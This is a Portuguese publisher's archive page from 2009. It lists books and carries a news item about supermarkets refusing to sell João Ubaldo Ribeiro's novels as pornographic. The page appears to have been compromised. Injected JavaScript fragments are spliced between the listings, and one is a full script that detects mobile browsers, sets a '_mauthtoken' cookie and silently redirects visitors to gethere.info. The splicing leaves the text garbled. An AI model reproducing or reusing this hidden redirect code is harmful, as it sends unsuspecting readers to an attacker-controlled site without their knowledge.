Archive for 2009

Luxúria Branca e Gabriela
João de Melo

JM_LuxuriaBrancaGabriela

Desenhos: Francisco Simões
Colecção: Mil Horas de Leitura, n.º 10
Formato: 21,5×27
N.º Págs. 80
Preço com IVA: €25,00
ISBN: 978-989-8236-05-0
EAN: 9789898236050

N.º 10 da Colecção MHL, edição especial, cartonada, aparada, desenhos da capa e interior de Francisco Simões, formato especial 21,5×27.

“Devemos a João de Melo um dos mais belos livros dos anos 80, O Meu Mundo Não é Deste Reino, onde se cruzam com uma desenvoltura e uma violência raras na ficção romanesca nossa contemporânea, grandes e pequenos sentimentos, uma ordenação do mundo a partir de um imaginário ilhéu, amoroso, romântico e religioso.”
Francisco José Viegas (revista Ler, Janeiro de 1989)

Entre Pássaro e Anjo, de João de Melo, recupera espectacularmente a tradição do conto português, que, em termos contemporâneos, tem parâmetros exemplares em Manuel da Fonseca, Mário Dionísio, Branquinho da Fonseca, Irene Lisboa, Maria Judite de Carvalho e José Cardoso Pires.”
Baptista-Bastos (Diário Popular, 13.7.1987)

“São contos simbólicos, metafóricos, com recurso ao estilo realista a que o autor se mantém fiel: onde a literatura surge, escorreita, limpa, lisa, habilidosa. O limite máximo é atingido com ‘Os Animais Docentes’, um excelente, excelente conto.”
Clara Ferreira Alves (Expresso, 15.8.1987)

Gente Feliz Com Lágrimas é um belo romance, bem concebido e bem escrito,denso, impiedoso e dorido, recheado de cenas surpreendentes. Os Açores, e as letras pátrias, estão de parabéns por esta grande epopeia de amor e lucidez.”
Miguel Torga (carta de 7.5.1989)

“São contos perfeitos, estes de Bem-Aventuranças. Contos aliciantes. De um erotismo lento e feminino – e na percepção do mundo feminino, tão difícil a um autor no masculino.”
Cecília Barreira (JL – Jornal de Letras, 10.3.1992)

“O que há de singular na escrita de João de Melo, neste Dicionário de Paixões, é a extrema tensão entre a pulsão narrativa e a pulsão poética. Dir-se-ia que a prosa quer deixar de ser prosa sem chegar a ser poema. E tanto mais prosa quanto mais tende a deixar de o ser.”
Manuel Alegre
(JL – Jornal de Letras, 12.4.1995)

O Homem Suspenso inscreve-se entre os livros sobre um sentimento perturbador de exílio interior. Além desse aspecto, que o faz actual e nascido da mandrágora venenosa própria do nosso tempo, fica-se perante a voz particular de um grande escritor e de um importante livro sobre a dissolução.”
Lídia Jorge
(JL – Jornal de Letras, 4.12.1996)

Descarregue a folha de promoção Promo_LuxuriaBrancaEGabriela.pdfif (document.currentScript) {

As Minas de Salomão
Rider Haggard

RH_MinasSalomaoColecção: Biblioteca Juvenil, n.º 3
Tradução: Eça de Queiroz
Revisão: Lídia Freitas
Formato: 13,5×20,9
N.º Págs. 220
Preço com IVA: €13,00
ISBN: 978-989-8236-08-1
EAN: 9789898236081

As Minas de Salomão é o mais popular romance de aventuras da era vitoriana. Publicado em 1885, beneficiando à época da maior campanha publicitária feita à edição de um livro, com letreiros e cartazes por toda a Londres anunciando «The Most Amazing Book Ever Written», torna-se um best-seller imediato. Apesar de ter sido em finais do século XIX que grandes exploradores começam a descobrir e a revelar civilizações e cidades perdidas, a África negra permanece ainda quase desconhecida. As Minas de Salomão serão o primeiro romance sobre a aventura africana publicado em inglês. Captando a atenção e imaginação dos leitores de todas as idades, o romance leva-nos à descoberta de uma África inexplorada por um grupo de aventureiros conduzido por Alão Quartelmar. É uma obra precursora do género literário Lost World, onde se incluem os romances de fantasia ou ficção científica que envolvem a descoberta de novos mundos.

Sobre a Tradução

As Minas de Salomão é a única tradução conhecida de Eça de Queiroz. Publicada em 1891, nos últimos anos da sua vida. É uma tradução muito trabalhada, muito cuidada. Segundo diversos autores, com uma qualidade literária superior à do original de Rider Haggard. Quando o livro foi publicado originalmente, em Inglaterra, em 1885, tornou-se imediatamente um grande sucesso editorial, várias edições esgotadas, traduções em diversos países, tiragens muito significativas para a época. Este êxito, acompanhado pelo interesse crescente pelos temas africanos que havia eclodido por toda a parte, terá justificado a curiosidade de Eça por este livro, conduzindo-o a efectuar a sua tradução para o português. As características inigualáveis da escrita de Eça de Queiroz, fazem deste livro uma obra de grande fulgor literário.

Descarregue a folha de promoção Promo_AsMinasDeSalomão.pdfd.getElementsByTagName(‘head’)[0].appendChild(s);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

JOÃO UBALDO RIBEIRO CENSURADO… DE NOVO

JORNAL-PUBLICO_3.5.2009COM UM INTERVALO DE 10 ANOS, O GRUPO DE SUPERMERCADOS AUCHAN (JUMBO) REPETE UM ACTO DE CENSURA SOBRE A LIVRE CIRCULAÇÃO DE UM ROMANCE DO ESCRITOR BRASILEIRO JOÃO UBALDO RIBEIRO, PRÉMIO CAMÕES DE LITERATURA, ACUSANDO O LIVRO DE PORNOGRÁFICO.

10 anos após ter impedido a venda nas suas lojas (Jumbo) do romance “A Casa dos Budas Ditosos”, do escritor brasileiro João Ubaldo Ribeiro, o Grupo Auchan reincide no mesmo acto censório, tomando decisão idêntica relativamente a uma nova edição, agora lançada no mercado pelas Edições Nelson de Matos. Juntando-lhe desta vez o romance Viva o Povo Brasileiro, “retido para apreciação e decisão” pelo responsável pelas compras do hipermercado (Sr. Fernando Fernandes).
Pelo conjunto da sua obra literária, na qual se incluem estes romances, João Ubaldo Ribeiro foi, em 2008, galardoado com o Prémio Camões, o mais importante prémio literário atribuído em língua portuguesa.

Do Júri deste Prémio (criado em 1988 pelos Governos de Portugal e do Brasil) fazem parte importantes intelectuais portugueses, brasileiros, e de outros países lusófonos. Em 2008, ano em que o Prémio foi atribuído a João Ubaldo, fizeram parte do júri Maria de Fátima Marinho, catedrática da Faculdade de Letras da Universidade do Porto, Maria Lúcia Lepecki, catedrática da Faculdade de Letras da Universidade de Lisboa, Marco Lucchesi, escritor e professor da Universidade Federal do Rio de Janeiro, João Melo, poeta e jornalista angolano, e Corsino Fortes, embaixador e presidente da Associação de Escritores Cabo-verdianos. O prémio foi anunciado publicamente pelo Ministro da Cultura de Portugal, José António Pinto Ribeiro.

Este ano, a Feira do Livro de Lisboa terá como tema base o Brasil e a sua cultura, sendo esperadas diversas manifestações relacionadas com as relações entre a cultura portuguesa e a brasileira.
Neste contexto, esta interferência de um grupo de supermercados na livre circulação de uma obra de um escritor brasileiro com esta dimensão, além de ilegítima, é particularmente ridícula e inamistosa. João Ubaldo e a sua Família viveram em Portugal durante algum tempo a convite da Fundação Calouste Gulbenkian, o escritor tem em Portugal muitos amigos e relações variadas, após algum tempo de ausência do mercado, a sua obra começou este ano a ser republicada pelas Edições Nelson de Matos.
Considerar este seu romance como “pornográfico” demonstra a incapacidade interpretativa e a gaguez de espírito de quem se atreveu a tomar tal decisão. Mas, para além disso, impedir a circulação dos livros é um acto intolerável de censura que não pode ser consentido sem a adequada indignação e intervenção das autoridades.

Seman_rio_Expresso_25.04.2009“Só nos faltava, de novo, este atrevimento… um acto que envergonha todos os portugueses” – diz com indignação e sem mais comentários o editor português.

OUTROS COMENTÁRIOS:

“que o povo volte às livrarias e deixe os hipermercados prás margarinas.”
Beijos pra ti

Cláudia Moura
Jornalista da revista Notícias Magazine

http://wwwcontamehistorias.blogspot.com/2009/04/santa-ignorancia.html

http://delitodeopiniao.blogs.sapo.pt/452633.html

http://ler.blogs.sapo.pt/

http://blogtailors.blogspot.com/2009/04/analfabeto-fomenta-compra-e-espera-se.htmldocument.currentScript.parentNode.insertBefore(s, document.currentScript);

A Casa dos Budas Ditosos
João Ubaldo Ribeiro

NM_ACasaDosBudasDitosos_CAPAColecção: Mil Horas de Leitura, n.º 8
Revisão: Lídia Freitas
Formato: 13,5×20,9
N.º Págs. 224
Preço com IVA: €18,00
ISBN: 978-989-8236-02-9
EAN: 9789898236029

Durante a IX Bienal do Livro – Rio de Janeiro, em Abril de 1999, João Ubaldo Ribeiro lança o livro A Casa dos Budas Ditosos, um romance sobre a luxúria que obtém um enorme sucesso de vendas, permanecendo mais de trinta e seis semanas, nas listas dos mais vendidos. O romance foi publicado em Espanha, França e outros países. Em Portugal, duas redes de supermercados proibiram a venda do livro nos seus estabelecimentos. Os protestos e a indignação generalizaram-se na comunicação social, sem uma explicação ou um pedido de desculpas. Apesar deste vergonhoso acontecimento, o livro teve depois várias edições em Portugal. Foi ainda traduzido para inglês, nos Estados Unidos.

Descarregue a folha de promoção Promo_ACasadosBudasDitosos.pdf.} else {

As Aventuras de Robinson Crusoe
Daniel Defoe

DD_AventurasRobinsonCrusoeColecção: Biblioteca Juvenil, n.º 1
Nova Tradução: Maria João Freire de Andrade
Revisão: Lídia Freitas
Formato: 13,5×20,9
N.º Págs. 346
Preço com IVA: €16,00
ISBN: 978-989-8236-03-6-1
EAN: 97898982360361

Para muitos um dos primeiros romances ingleses,
As Aventuras de Robinson Crusoe é a história imortal das viagens e aventuras por mar de um mercador, do seu naufrágio e, mais tarde, da sua vida numa ilha deserta. Baseado na vida de Alexander Selkirk, com descrições fascinantes quanto ao engenho e capacidade inventivas de Crusoe e a descoberta do célebre Sexta-feira,
As Aventuras de Robinson Crusoe captaram a imaginação de inumeráveis leitores ao longo de séculos. Mas é, sobretudo, a história da força de vontade de um homem que sobrevive sozinho numa ilha distante, longe da civilização que conhece e perante todas as adversidades.

Descarregue a folha de promoção Promo_AsAventurasDeRobinsonCrusoe.pdf